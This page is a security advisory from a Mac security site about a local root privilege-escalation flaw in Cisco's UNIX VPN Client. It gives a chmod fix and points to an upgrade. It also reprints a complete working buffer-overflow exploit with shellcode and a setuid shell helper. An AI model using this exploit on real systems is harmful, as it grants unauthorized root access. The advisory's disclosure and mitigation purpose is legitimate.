SecureMac.com
About SecureMac Advertise Security Consulting Mac Security Store Send Feedback

Site Information
Site Background
Who runs the site
Advertising
Security Consulting
Employment/Jobs
Feedback Form

SecureMac Software
PrivacyScan

 

Mac OS X Security
sudo buffer overflow exploit + fix
Disable Single User Boot Mode
Malevolence - Dumping Passwords
nidump security
Startup Security - Open Firmware Password Protection

Mac OS X Network Security
SAINT
Secure FTP Wrapper
Ettercap - sniffer interceptor logger
Snort - Network Intrusion Detection System
SSH Admin
SSH Helper
xnu - enable MAC Address spoofing


Mac OS X Virus

Mac OS X Firewalls
Firewalk Firewall Utility
NetBarrier X

Mac OS X App Sec.

Mac OS X Encryption
LittleSecrets
GPGMail - PGP Functionality

Mac OS X DoS

SecureMac Library
Mac Cable Modem Security
Mac Security Auditing
Mac OS X Security Understanding
Mac OS X Security Second Lessons
Mac OS X Security Third Lesson
Mac OS X Single User Mode Root Access
Mac OS X Shareware Firewalls
Mac OS X Secure Installation
Cable & DSL Connections - Security Measures
Better Safe than Sorry
Apple.com Security Resources
Marketing Macintosh Security Programs

Cisco VPN Client For Mac OS X can be exploited locally



About Cisco VPN Client:
The Cisco VPN (Virtual Private Network) Client establishes an encrypted tunnel between a local system and a Cisco VPN Concentrator. The tunnel provides confidentiality and integrity for the data in transit, allowing a user on the local system to securely connect to a corporate network via a public, possibly untrusted network.

Information:
Cisco's VPN Client for Mac OS X, Linux and Solaris contains a security vulnerability which results in administrative privledges via a exploit. The Virtual Private Network (VPN) client allows for the Non-Windows platform to function over a VPN network. Window's users need not worry by this particular security advisory.

A local user could exploit the Cisco UNIX VPN client software if installed on the computer by executing arbitrary code granting administrative privledges. If the user has not altered the setuid permissions vpnclient will give administrative privledges allowing the user to modify any part of the system without authorization.

Fix/Update
The vpnclient vulernability may be mitigated by altering the permission of the binary using the chmod command. In the Terminal window as administrative or root account execute the following command:

/bin/chmod 755 /usr/local/bin/vpnclient


The vulnerability has been fixed in version 3.5.2 which should be made downloadable by Cisco shortly via their website. Go to the Cisco Software distribution center at Cisco's Web Page to download the new version of the UNIX VPN client.

Exploit/Code for Cisco VPN Client for Linux/Mac OS X
The code from AngryPacket Security - vpnKILLient.c is listed below for example to see how the exploit is executed.

/* buffer overflow for cisco's vpnclient for linux
tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz

to get this to properly work, you need to put the following code into
xx.c, compile it (as xx), and place the executable into /tmp (to bypass
tight PAM restrictions)

#include <stdio.h>
main() {
setuid(0);
execl("/bin/sh", "sh", NULL);
}

then compile this and run it. syntax is ./vpnclient <offset>
tested under gentoo linux and debian:
$ ls -la `which vpnclient`
-rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
$ ./vpnKILLient 
addr: 0xbffffbac, offset: 0
Cisco Systems VPN Client Version 3.5.1 (Rel)
Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
Client Type(s): Linux
Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686

sh-2.05a# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)

greetz: all of the angrypacket crew (of course)
shok -> pheerable^2;
vegac -> 31336++;

when you get a chance, check out http://sec.angrypacket.com
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90
#define LEN 620 /* 520 to own eip */

/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\x31\xc0\x50\x68\x2f\x2f\x78\x78"
"\x68\x2f\x74\x6d\x70\x89\xe3\x31"
"\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
"\x0b\xcd\x80\x00";

unsigned long get_sp (void) {
__asm__("mov %esp,%eax");
}
int main(int argc, char *argv[]) {

int i, offset=0;
long addr;
char *buf, *ptr;

if(argc > 1) offset = atoi(argv[1]);

buf = (char *)malloc(sizeof(char) * LEN);
bzero(buf, LEN);
addr = get_sp() - offset;
printf("addr: 0x%x, offset: %d\n", addr, offset);

for(i = 0; i < LEN; i += 4) {
*(long *)&buf[i] = addr;
}

for(i = 0; i < (LEN / 2); i++) {
*(buf + i) = NOP;
}

ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
for(i = 0; i < strlen(shell); i++) {
*(ptr++) = shell[i];
}
buf[LEN - 1] = '\0';

execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);
return(0);

}


More details can be obtained by visiting the Cisco Security Advisory: Buffer Overflows in UNIX VPN Client

Feedback Time:

Enter Email Address:

Enter your message:


Select Either of These Two Buttons


Special thanks goes out to Jess K. Frykholm for making us aware of this security issue!


Security + OS
DiskLock
PowerBook Security Control Panel
Empower Pro
FileGuard
FreeGuard
FoolProof
Deus Lock Master
OnGuard
Keys Off
LockOut
MacOS Algorithm
Modem Security
Password Key
PGPuam
PPF
Shift Key Suite
Stealth Signal
SuperLock Lite
SuperLock Pro
Web-Confidential


Macintosh Viruses
Disinfectant
Sophos Anti-Virus
Norton AntiVirus
Nav 7 Nav 6 Nav X
Virex - Oct
VirusBarrier - Netupdate
vScan - Discontinued.

Mac Physical Security


Macintosh Firewalls
DoorStop Firewall
Firewall Q & A
IPNetSentry
NetBarrier
Norton Personal Firewall

Mac Spyware & Privacy
Monitorer
NetShred - Delete Files Safely

Network Security
MacAnalysis
Oyabun Tools
WDTech RAE
ToolDaemon

Application Security Issues
AIM - AOL Instant Messenger
Back Orifice
Eudora E-Mail Client
Internet Configure
IE 5.1, OE 5.1, Powerpoint, Excel Vulnerability
MS Personal webServer
NetBus
Outlook Express 4.5 Password Flaw
SubSeven
Sub7ME Server

Resource Info
AppleShare Server Info

Mac OS Encryption
EnScript
FGP
FileTwister
ForgotIt?
GenPass
MacLockSmith
My-Privacy
My Secret
PGPi
PGPhone
PGP Personal
PGP Freeware
PowerCrypt-dev
Private File
Quick Encrypt
SubRosa Utilities
Tresor

Deleting Files
Eraser Pro
ShredIt

Backups

Apple Hardware

MacOS DoS
Mac Attack


All material (c) 2014 SecureMac.com and respected owners